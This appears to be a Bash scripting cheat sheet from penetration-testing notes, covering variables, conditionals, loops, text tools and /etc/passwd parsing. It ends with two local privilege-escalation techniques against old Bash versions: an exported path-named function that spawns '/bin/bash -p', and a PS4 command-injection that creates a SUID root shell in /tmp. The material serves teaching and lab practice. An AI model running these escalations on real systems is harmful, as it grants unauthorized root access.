Bash
alias
# Interactive shortcuts: go up one directory, and a long listing that
# includes dotfiles. Aliases are only expanded in interactive shells, so
# they belong in ~/.bashrc rather than in scripts.
alias ..="cd .."
alias ll="ls -la"
shebang #!
#! /bin/bash
make the script executable
# Add the execute bit; '--' stops option parsing so a file name starting
# with '-' cannot be taken as a flag.
chmod +x -- hack.sh
execute file
# Run the script from the current directory. This needs the execute bit set
# above; the interpreter is taken from the script's shebang line.
./hack.sh
variables
# Assign a value to a shell variable (no spaces around '=').
TARGET='10.10.99.99'
print variable
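# Quote the expansion so the value is printed as a single word, untouched by
# word-splitting and globbing.
echo "$TARGET"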
Arguments
#!/bin/bash
# Positional parameters: $1 and $2 hold the first two command-line arguments.
printf 'Arg-1 %s arg-2 %s\n' "$1" "$2"
Key | Value |
---|---|
$0 | The name of the Bash script |
$1 - $9 | The first 9 arguments to the Bash script |
$# | Number of arguments passed to the Bash script |
$@ | All arguments passed to the Bash script |
$? | The exit status of the most recently run process |
$$ | The process ID of the current script |
$USER | The username of the user running the script |
$HOSTNAME | The hostname of the machine |
$RANDOM | A random number |
$LINENO | The current line number in the script |
Assign arguments
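#!/bin/bash
# Read a line from stdin into a variable and echo it back.
# 'read -r' keeps backslashes literal; quoting "$name" keeps whitespace intact.
echo "What is your name ?"
read -r name
echo "Your name is $name"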
Assign output
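#!/bin/bash
# Capture a command's output in a variable with $(...).
user=$(whoami)
# Prints the current user name (the trailing "kali" on the original line
# looks like pasted sample output rather than part of the command).
echo "$user"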
If / Else / Elif
If (string)
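#!/bin/bash
# Branch on a string read from stdin.
echo "Select scan XSS/SQLi"
read -r -p "Attack name:" action
# [[ ]] does no word-splitting, so an empty or multi-word answer cannot break
# the comparison (with [ $action == 'XSS' ] an empty answer is a syntax error).
if [[ "$action" == 'XSS' ]]; then
  echo "XSS attack..."
fi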
If (number)
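#!/bin/bash
# Numeric comparisons on a value read from stdin.
echo "Number of request"
read -r -p "Nr:" action
# Only accept a plain integer: -lt/-eq/-gt error out on anything else, and a
# numeric test inside [[ ]] or (( )) would arithmetically evaluate untrusted
# input, which is not something to do with raw user text.
if [[ ! "$action" =~ ^[0-9]+$ ]]; then
  echo "Not a number: $action" >&2
  exit 1
fi
if [ "$action" -lt 10 ]; then
  echo "< 10"
fi
if [ "$action" -eq 10 ]; then
  echo "== 10"
fi
if [ "$action" -gt 10 ]; then
  echo "> 10"
fi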
If-Else
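#!/bin/bash
# if/else on a number read from stdin.
echo "Number of request"
read -r -p "Nr:" action
# Only accept a plain integer: [ -eq ] errors out on anything else, and a
# numeric test inside [[ ]] or (( )) would arithmetically evaluate the input.
if [[ ! "$action" =~ ^[0-9]+$ ]]; then
  echo "Not a number: $action" >&2
  exit 1
fi
if [ "$action" -eq 10 ]; then
  echo "OK"
else
  echo "No OK"
fi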
If-ElseIf-Else
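#!/bin/bash
# if/elif/else on a number read from stdin.
echo "Number of request"
read -r -p "Nr:" action
# Only accept a plain integer: [ -eq ] errors out on anything else, and a
# numeric test inside [[ ]] or (( )) would arithmetically evaluate the input.
if [[ ! "$action" =~ ^[0-9]+$ ]]; then
  echo "Not a number: $action" >&2
  exit 1
fi
if [ "$action" -eq 10 ]; then
  echo "OK.1"
elif [ "$action" -eq 20 ]; then
  echo "OK.2"
else
  echo "No OK"
fi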
Logical Operations
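# '&&' runs the right-hand side only when the left succeeded, '||' only when
# it failed. -q makes grep a silent test instead of printing matching lines.
grep -q 'kali' /etc/passwd && echo "User exist"
grep -q 'john' /etc/passwd || echo "User NOT exist"
# Quote "$(whoami)" so [ ] still has an operand if the output were empty.
[ "$(whoami)" == 'kali' ] && echo "Not root user"
[ "$(whoami)" == 'root' ] && echo "Root user"
# With '||' the message runs when the test FAILS; the original tested
# != 'root', so "NOT ROOT" was printed only when actually running as root.
[ "$(whoami)" == 'root' ] || echo "Ah NOT ROOT"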
For
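#!/bin/bash
# Enumerate 10.11.1.1 .. 10.11.1.10. The $(seq ...) output is deliberately
# unquoted: word-splitting is what turns it into the loop values.
for ip in $(seq 1 10); do
  echo "10.11.1.$ip"
done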
#!/bin/bash
# Same enumeration using a brace expansion, which needs no external program.
for ip in {1..10}; do
  printf '%s\n' "10.11.1.$ip"
done
While
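#!/bin/bash
# Count from 1 to 5 with a while loop.
index=1
while [ "$index" -le 5 ]; do
  # NOTE(review): this prints 10.10.101 .. 10.10.105; the for-loop examples
  # put a dot before the counter (10.11.1.$ip) -- confirm whether
  # "10.10.10.$index" was intended.
  echo "10.10.10$index"
  index=$((index + 1))   # names need no '$' inside $(( ))
done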
Function
#!/bin/bash
# A function groups commands under a name that can be called repeatedly.
banner() {
  printf '%s\n' "Super HaCkEr Engine"
}
banner
banner
sed
# Replace the first match of "Cat" on the line; a here-string feeds the text
# to sed without an extra echo process.
sed 's/Cat/Robot/' <<<"I am Mr.Cat"
cut
# Select fields 1, 3 and 5 of a comma-separated record (-d sets the delimiter).
cut -d, -f1,3,5 <<<"root,lorem,password123,ipsum,/root"
# root,password123,/root
awk
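# Print user (field 1) and home directory (field 6) of each passwd entry.
# awk reads the file itself; piping it through cat only adds a process.
awk -F: '{printf "USER--> %s\t HOME--> %s\n", $1, $6}' /etc/passwd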
piping
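# Two ways to print user and home directory for passwd entries that contain
# /bin/false. grep reads the file directly; no cat needed.
grep '/bin/false' /etc/passwd | cut -d: -f1,6 | awk -F: '{printf "user: %s home:%s\n", $1, $2}'
# Same result, letting awk pick the fields itself:
grep '/bin/false' /etc/passwd | awk -F: '{printf "user: %s home:%s\n", $1, $6}'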
compare
diff
vimdiff
comm
download
wget
curl
axel
filter out static-asset file types
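# Drop lines for static assets. The dots must be escaped: in an extended
# regex an unescaped '.' matches any character, so the original '.md' also
# removed lines containing e.g. "command" and '.js' anything ending in "js".
grep -v -E '\.(js|css|gif|svg|png|jpg|ttf|eot|woff|md)' feroxbuster_80.txt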
split on whitespace, take the 6th field, sort, uniq, filter
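# Field 6 of each line, de-duplicated (sort -u is sort | uniq in one step),
# minus static assets; dots are escaped so '.md' only matches a literal ".md".
awk '{print $6}' feroxbuster_80.txt | sort -u | grep -v -E '\.(js|css|gif|svg|png|jpg|ttf|eot|woff|md)'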
wipe all whitespace including newlines from file
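# Delete spaces, tabs, newlines and carriage returns; tr reads stdin, so
# redirect the file in instead of piping it through cat.
tr -d ' \t\n\r' < file.txt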
Bash bugs
Bug in bash < 4.2-048
In Bash versions <4.2-048 it is possible to define shell functions with names that resemble file paths, then export those functions so that they are used instead of any actual executable at that file path.
# Check the version first: the behaviour below only applies to bash older
# than 4.2-048 (see the heading above); newer releases do not honour it.
/bin/bash --version
# The function name is an absolute path, and export -f puts it in the
# environment so a child bash resolves that name to the function instead of
# the real binary. Defensively, the fix is a current bash; a privileged
# program that runs other commands through a shell, inheriting the caller's
# environment, is the weak point to harden.
function /usr/sbin/service { /bin/bash -p; }
export -f /usr/sbin/service
If any binary then runs, for example, /usr/sbin/service apache2 start, the exported function is executed in its place and our code runs.
Bash versions < 4.4
When in debugging mode, Bash uses the environment variable PS4 to display an extra prompt for debugging statements.
Run the /usr/local/bin/suid-env2 executable with bash debugging enabled and the PS4 variable set to an embedded command which creates an SUID version of /bin/bash:
# Only bash older than 4.4 (see heading above) expands PS4, including the
# $(...) inside it, while tracing a privileged (SUID) program. Mitigation is
# a current bash; SHELLOPTS=xtrace together with a PS4 containing a command
# substitution in a SUID process's environment is a clear indicator of this
# technique for detection purposes.
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2
Run the /tmp/rootbash executable with -p to gain a shell running with root privileges:
# -p (privileged mode) keeps the effective uid granted by the SUID bit
# instead of resetting it to the real uid.
/tmp/rootbash -p